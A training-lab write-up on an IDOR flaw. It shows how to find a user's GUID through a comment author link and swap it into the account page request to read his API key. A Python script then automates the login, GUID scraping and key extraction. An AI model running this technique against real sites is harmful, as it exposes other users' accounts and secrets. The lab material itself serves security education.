User ID Controlled by Request Parameter, with Unpredictable User IDs
Lab
User ID controlled by request parameter, with unpredictable user IDs · Apprentice
Solution
Given
This lab has a horizontal privilege escalation vulnerability on the user account page, but identifies users with GUIDs.
To solve the lab, find the GUID for carlos, then submit his API key as the solution.
You can log in to your own account using the following credentials: wiener:peter
Analyzing the task
The lab is very similar to the previous one, except that users are identified by GUIDs instead of predictable IDs, so we first have to find the target user's GUID somewhere on the site before we can substitute it.
Recon
Log in as our user and watch the requests in the proxy history. Our own API key is shown on the account page, which is fetched with our own GUID in the id parameter.
Walk around the site: the home page lists the blog posts, so open the first one. carlos has left a comment, and his name is rendered as a link. Click it:
GET /blogs?userId=2481e38a-2dba-4f3b-a2a1-433c37c9ce03
That is the target user's GUID. Now request the account page exactly as before, but with carlos's GUID substituted for our own in the id parameter:
GET /my-account?id=2481e38a-2dba-4f3b-a2a1-433c37c9ce03
The response contains:
<div>Your API Key is: uqyLbJbk1E14YlHvsWrB2jHaL3C3lvQd</div>
Lab solved!
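The same walk, automated. This is an added example and not the lab's or the author's own code: it assumes the standard lab layout (a POST /login form with username and password, an optional hidden csrf field, post links of the form /post?postId=N, comment author links of the form /blogs?userId=<GUID>, and the "Your API Key is: ..." line on /my-account?id=<GUID>). The parsing helpers are pure functions and run offline against a constructed sample; only solve() talks to a live lab.

```python
import re
import sys
import http.cookiejar
import urllib.parse
import urllib.request
from typing import List, Optional, Tuple

# GUID as it appears in the lab's userId parameter (8-4-4-4-12 hex groups).
GUID = r"[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"

# Constructed fragment in the shape the lab renders a comment header (sample data,
# not captured from a live lab); lets the parsers be exercised offline.
SAMPLE_COMMENT_HTML = (
    '<p><a href="/blogs?userId=2481e38a-2dba-4f3b-a2a1-433c37c9ce03">carlos</a>'
    " | 01 January 2024</p>"
)


def post_links(html: str) -> List[str]:
    """Collect the distinct /post?postId=N links from the blog index, lowest id first."""
    links = set(re.findall(r'href="(/post\?postId=\d+)"', html))
    return sorted(links, key=lambda s: int(s.rsplit("=", 1)[1]))


def find_user_guid(html: str, username: str) -> Optional[str]:
    """Return the GUID behind an author link whose text is exactly `username`.

    Matches anchors like <a href="/blogs?userId=<GUID>">carlos</a>, which is how
    the lab renders a comment author's name; extra attributes on the tag are fine."""
    pattern = re.compile(
        r'<a[^>]*href="[^"]*\?userId=(' + GUID + r')"[^>]*>\s*'
        + re.escape(username)
        + r"\s*</a>",
        re.IGNORECASE,
    )
    match = pattern.search(html)
    return match.group(1) if match else None


def extract_api_key(html: str) -> Optional[str]:
    """Pull the key out of the account page's 'Your API Key is: ...' line."""
    match = re.search(r"Your API Key is:\s*([A-Za-z0-9]+)", html)
    return match.group(1) if match else None


class LabSession:
    """Minimal cookie-aware HTTP client (stdlib only, no extra dependencies)."""

    def __init__(self, base_url: str) -> None:
        self.base = base_url.rstrip("/")
        jar = http.cookiejar.CookieJar()
        self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))

    def get(self, path: str) -> str:
        with self.opener.open(self.base + path) as resp:
            return resp.read().decode("utf-8", "replace")

    def post(self, path: str, form: dict) -> str:
        body = urllib.parse.urlencode(form).encode()
        with self.opener.open(self.base + path, data=body) as resp:
            return resp.read().decode("utf-8", "replace")


def solve(base_url: str, creds: Tuple[str, str] = ("wiener", "peter"),
          target: str = "carlos") -> Tuple[str, str]:
    """Log in, find the target's GUID via a comment author link, then read their API key."""
    s = LabSession(base_url)
    form = {"username": creds[0], "password": creds[1]}
    # Assumption: the login form may carry a hidden csrf field; forward it if present.
    csrf = re.search(r'name="csrf"\s+value="([^"]+)"', s.get("/login"))
    if csrf:
        form["csrf"] = csrf.group(1)
    s.post("/login", form)

    guid = None
    for link in post_links(s.get("/")):
        guid = find_user_guid(s.get(link), target)
        if guid:
            break
    if guid is None:
        raise RuntimeError(f"no comment by {target!r} found on any post")

    # The IDOR itself: our own session cookie, the victim's id in the parameter.
    key = extract_api_key(s.get("/my-account?id=" + guid))
    if key is None:
        raise RuntimeError("account page did not expose an API key")
    return guid, key


if __name__ == "__main__":
    if len(sys.argv) != 2:
        # Offline mode: show the parser picking the GUID out of the constructed sample.
        print("sample GUID for carlos:", find_user_guid(SAMPLE_COMMENT_HTML, "carlos"))
        sys.exit("usage: solve.py https://<lab-id>.web-security-academy.net")
    target_guid, api_key = solve(sys.argv[1])
    print(f"carlos GUID: {target_guid}")
    print(f"carlos API key: {api_key}")
```

The author link is matched on its visible text rather than on the GUID itself, so the script does not care which post carries the comment; any page on the site that links a username to /blogs?userId= would work as the leak. If the lab's login form or link shapes differ from the assumptions above, the regexes in post_links and find_user_guid are the only places that need adjusting.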